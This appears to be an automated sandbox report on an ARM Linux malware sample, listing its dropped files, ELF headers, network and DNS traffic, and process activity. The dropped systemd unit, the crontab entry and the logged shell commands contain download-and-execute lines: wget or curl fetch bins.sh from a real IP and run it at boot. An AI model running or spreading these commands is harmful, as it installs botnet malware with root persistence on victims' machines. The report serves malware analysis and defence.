                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):368
                                                                          Entropy (8bit):5.1179187477067245
                                                                          Encrypted:false
                                                                          SSDEEP:6:z872KstRZAMg8uko4dj2+fe8QLt2irvFNBjaQLt2iFLnLQmWA4Rv:zE2ltRZAXsQ+GBgirvFNBjbgipLHWrv
                                                                          MD5:D5DD9D080F2C49AEB3452E4BA676754A
                                                                          SHA1:B27F933CEF628157923729D6D34955048B81A087
                                                                          SHA-256:BF780E1BC1DA935D7C6033DE37705E758306C6F00033EF0CE3FAC6D6D917560D
                                                                          SHA-512:51B4DAEEAFAFC82F1D254F3C07EC24D9C5ED36903B8218F0C530C4652F1BB2D2B8A698A51279908F7859A968F7F40EE199F6EDF3EB1C07335E33561D4ED46BA5
                                                                          Malicious:false
                                                                          Preview:[Unit].Description=My Miscellaneous Service.After=network.target..[Service].Type=simple.User=root.WorkingDirectory=/tmp.ExecStart=/bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh".Restart=no..[Install].WantedBy=multi-user.target.
                                                                          Process:/usr/bin/crontab
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):241
                                                                          Entropy (8bit):5.153970825243814
                                                                          Encrypted:false
                                                                          SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQjzpliGMQ5UYLtCFt3HY8VQLtc:8QjHig8hlUeHLUHYHO
                                                                          MD5:5C2C2F85847F83381826D5B3253562D1
                                                                          SHA1:10A37ECEFCADB1F076EB7D9FCD339601E6F31EC6
                                                                          SHA-256:D2C48FE62B13A73587BA336AAC06B069F9335A261CC51C248BEEAD8A7AFD7DF8
                                                                          SHA-512:CCBD819E7A3FB0AC3425DCE7455D29748695E130F88181D3168EA8D2C0D22EEC5111F9219E52720F33E1B307E4BC1902F07E1FA39B199F695B485546BBC2106F
                                                                          Malicious:true
                                                                          Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Mon Mar 24 00:33:16 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot /bin/bash -c /bin/wget http://155.138.230.16/bins/bins.sh.
                                                                          File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                          Entropy (8bit):6.133537131051246
                                                                          TrID:
                                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                          File name:armv5l.elf
                                                                          File size:87'024 bytes
                                                                          MD5:2eb05c82dd867d19f432722b6393620a
                                                                          SHA1:83883d2885e8c43892b39d7b9a96c02aa25cc8b4
                                                                          SHA256:11335d592783cdd2847de8cafab26385c08f710e1ff5c98217fba94ab53029e4
                                                                          SHA512:62100806f781ed1071c3a08a944a3cb43efdeee27c3f4bb3a8868790bbb20c5cb996461bcc5528c28f7b06fe8d6441b7b3ffa9bcffde4ad721858e593808f893
                                                                          SSDEEP:1536:aonB6NBlNdxzwGjef1+KUs+b8aWSsV97MXitHeb95PYzar:eNJAff+b8aWVHeb9t4ar
                                                                          TLSH:F4831C47B9818E12C5C212BAFAAE418933137F78D3EE7212DD20AF9077865DB0D77616
                                                                          File Content Preview:.ELF..............(.....T...4....Q......4. ...(.....................H;..H;...............@...@...@.. ...Xi..........Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../. C.......@....-.@0....S

                                                                          ELF header

                                                                          Class:ELF32
                                                                          Data:2's complement, little endian
                                                                          Version:1 (current)
                                                                          Machine:ARM
                                                                          Version Number:0x1
                                                                          Type:EXEC (Executable file)
                                                                          OS/ABI:UNIX - System V
                                                                          ABI Version:0
                                                                          Entry Point Address:0x8154
                                                                          Flags:0x4000002
                                                                          ELF Header Size:52
                                                                          Program Header Offset:52
                                                                          Program Header Size:32
                                                                          Number of Program Headers:3
                                                                          Section Header Offset:86424
                                                                          Section Header Size:40
                                                                          Number of Section Headers:15
                                                                          Header String Table Index:14
                                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                          NULL0x00x00x00x00x0000
                                                                          .initPROGBITS0x80940x940x100x00x6AX004
                                                                          .textPROGBITS0x80b00xb00x122f40x00x6AX0016
                                                                          .finiPROGBITS0x1a3a40x123a40x100x00x6AX004
                                                                          .rodataPROGBITS0x1a3b80x123b80x17900x00x2A008
                                                                          .eh_framePROGBITS0x240000x140000x40x00x3WA004
                                                                          .init_arrayINIT_ARRAY0x240040x140040x40x00x3WA004
                                                                          .fini_arrayFINI_ARRAY0x240080x140080x40x00x3WA004
                                                                          .jcrPROGBITS0x2400c0x1400c0x40x00x3WA004
                                                                          .gotPROGBITS0x240100x140100x780x40x3WA004
                                                                          .dataPROGBITS0x240880x140880x2980x00x3WA004
                                                                          .bssNOBITS0x243200x143200x66380x00x3WA004
                                                                          .commentPROGBITS0x00x143200xdf00x00x0001
                                                                          .ARM.attributesARM_ATTRIBUTES0x00x151100x100x00x0001
                                                                          .shstrtabSTRTAB0x00x151200x750x00x0001
                                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                          LOAD0x00x80000x80000x13b480x13b486.14660x5R E0x8000.init .text .fini .rodata
                                                                          LOAD0x140000x240000x240000x3200x69583.99970x6RW 0x8000.eh_frame .init_array .fini_array .jcr .got .data .bss
                                                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                                                          Download Network PCAP: filteredfull

                                                                          • Total Packets: 37
                                                                          • 1290 undefined
                                                                          • 443 (HTTPS)
                                                                          • 80 (HTTP)
                                                                          • 53 (DNS)
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Mar 24, 2025 06:33:10.266448975 CET43928443192.168.2.2391.189.91.42
                                                                          Mar 24, 2025 06:33:11.802166939 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:15.897623062 CET42836443192.168.2.2391.189.91.43
                                                                          Mar 24, 2025 06:33:16.921572924 CET4251680192.168.2.23109.202.202.202
                                                                          Mar 24, 2025 06:33:17.000032902 CET597521290192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:33:18.009330034 CET597521290192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:33:18.253810883 CET4325280192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:33:19.257138968 CET4325280192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:33:20.025111914 CET597521290192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:33:21.272859097 CET4325280192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:33:22.296737909 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:24.088500023 CET597521290192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:33:25.368302107 CET4325280192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:33:32.023360968 CET43928443192.168.2.2391.189.91.42
                                                                          Mar 24, 2025 06:33:32.279326916 CET597521290192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:33:33.559165955 CET4325280192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:33:33.670388937 CET8043252155.138.230.16192.168.2.23
                                                                          Mar 24, 2025 06:33:42.261950016 CET42836443192.168.2.2391.189.91.43
                                                                          Mar 24, 2025 06:33:44.309673071 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:44.512067080 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.185874939 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.185936928 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.185972929 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.186000109 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.186007977 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.186042070 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.186081886 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.186146975 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.186146975 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.186146975 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.186146975 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.187366009 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.361377001 CET4251680192.168.2.23109.202.202.202
                                                                          Mar 24, 2025 06:33:46.420356035 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.421303988 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.421469927 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.421694040 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.682760000 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.682818890 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.682877064 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.682877064 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.684451103 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.914186954 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.914235115 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 24, 2025 06:33:46.914334059 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:46.914334059 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 24, 2025 06:33:48.405081034 CET597521290192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:33:48.512173891 CET129059752155.138.230.16192.168.2.23
                                                                          Mar 24, 2025 06:34:12.977689981 CET43928443192.168.2.2391.189.91.42
                                                                          Mar 24, 2025 06:34:32.138343096 CET597561290192.168.2.23155.138.230.16
                                                                          Mar 24, 2025 06:34:32.251159906 CET129059756155.138.230.16192.168.2.23
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Mar 24, 2025 06:33:16.881526947 CET4107653192.168.2.231.1.1.1
                                                                          Mar 24, 2025 06:33:16.997402906 CET53410761.1.1.1192.168.2.23
                                                                          Mar 24, 2025 06:34:32.020292044 CET5016653192.168.2.231.1.1.1
                                                                          Mar 24, 2025 06:34:32.137204885 CET53501661.1.1.1192.168.2.23
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Mar 24, 2025 06:33:16.881526947 CET192.168.2.231.1.1.10xca2Standard query (0)api.znet.homesA (IP address)IN (0x0001)false
                                                                          Mar 24, 2025 06:34:32.020292044 CET192.168.2.231.1.1.10x2975Standard query (0)api.znet.homesA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Mar 24, 2025 06:33:16.997402906 CET1.1.1.1192.168.2.230xca2No error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false
                                                                          Mar 24, 2025 06:34:32.137204885 CET1.1.1.1192.168.2.230x2975No error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false
                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                          Mar 24, 2025 06:33:46.186081886 CET54.171.230.55443192.168.2.2333606CN=motd.ubuntu.com CN=R10, O=Let's Encrypt, C=USCN=R10, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USSat Mar 22 09:18:05 CET 2025 Wed Mar 13 01:00:00 CET 2024Fri Jun 20 10:18:04 CEST 2025 Sat Mar 13 00:59:59 CET 2027771,4866-4867-4865-49196-49200-163-159-52393-52392-52394-49327-49325-49315-49311-49245-49249-49239-49235-49195-49199-162-158-49326-49324-49314-49310-49244-49248-49238-49234-49188-49192-107-106-49267-49271-196-195-49187-49191-103-64-49266-49270-190-189-49162-49172-57-56-136-135-49161-49171-51-50-69-68-157-49313-49309-49233-156-49312-49308-49232-61-192-60-186-53-132-47-65-255,0-11-10-35-22-23-13-43-45-51,29-23-30-25-24,0-1-2fb4726d465c5f28b84cd6d14cedd13a7
                                                                          CN=R10, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027

                                                                          System Behavior

                                                                          Start time (UTC):05:33:10
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/tmp/armv5l.elf
                                                                          Arguments:/tmp/armv5l.elf
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):05:33:10
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/tmp/armv5l.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):05:33:10
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/tmp/armv5l.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):05:33:15
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/tmp/armv5l.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):05:33:15
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/tmp/armv5l.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):05:33:15
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/tmp/armv5l.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):05:33:15
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:15
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:15
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:15
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/crontab
                                                                          Arguments:crontab -l
                                                                          File size:43720 bytes
                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                          Start time (UTC):05:33:16
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:16
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/chmod
                                                                          Arguments:chmod +x bins.sh
                                                                          File size:63864 bytes
                                                                          MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                          Start time (UTC):05:33:16
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:16
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/sh
                                                                          Arguments:sh bins.sh
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:16
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:16
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/curl
                                                                          Arguments:/bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
                                                                          File size:239848 bytes
                                                                          MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                                                                          Start time (UTC):05:33:32
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:32
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/chmod
                                                                          Arguments:chmod +x bins.sh
                                                                          File size:63864 bytes
                                                                          MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                          Start time (UTC):05:33:32
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/sh
                                                                          Arguments:sh bins.sh
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:15
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:15
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/crontab
                                                                          Arguments:crontab -
                                                                          File size:43720 bytes
                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                          Start time (UTC):05:33:32
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/tmp/armv5l.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Start time (UTC):05:33:32
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "/bin/systemctl enable bot"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:32
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:32
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/bin/systemctl
                                                                          Arguments:/bin/systemctl enable bot
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Start time (UTC):05:33:33
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Start time (UTC):05:33:33
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          File size:22760 bytes
                                                                          MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/rm
                                                                          Arguments:rm -f /tmp/tmp.MlUo8Pbvgs /tmp/tmp.yOIm4cNLGC /tmp/tmp.vogTzgA787
                                                                          File size:72056 bytes
                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/cat
                                                                          Arguments:cat /tmp/tmp.MlUo8Pbvgs
                                                                          File size:43416 bytes
                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/head
                                                                          Arguments:head -n 10
                                                                          File size:47480 bytes
                                                                          MD5 hash:fd96a67145172477dd57131396fc9608

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/tr
                                                                          Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                                          File size:51544 bytes
                                                                          MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/cut
                                                                          Arguments:cut -c -80
                                                                          File size:47480 bytes
                                                                          MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/cat
                                                                          Arguments:cat /tmp/tmp.MlUo8Pbvgs
                                                                          File size:43416 bytes
                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/head
                                                                          Arguments:head -n 10
                                                                          File size:47480 bytes
                                                                          MD5 hash:fd96a67145172477dd57131396fc9608

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/tr
                                                                          Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                                          File size:51544 bytes
                                                                          MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/cut
                                                                          Arguments:cut -c -80
                                                                          File size:47480 bytes
                                                                          MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):05:33:45
                                                                          Start date (UTC):24/03/2025
                                                                          Path:/usr/bin/rm
                                                                          Arguments:rm -f /tmp/tmp.MlUo8Pbvgs /tmp/tmp.yOIm4cNLGC /tmp/tmp.vogTzgA787
                                                                          File size:72056 bytes
                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b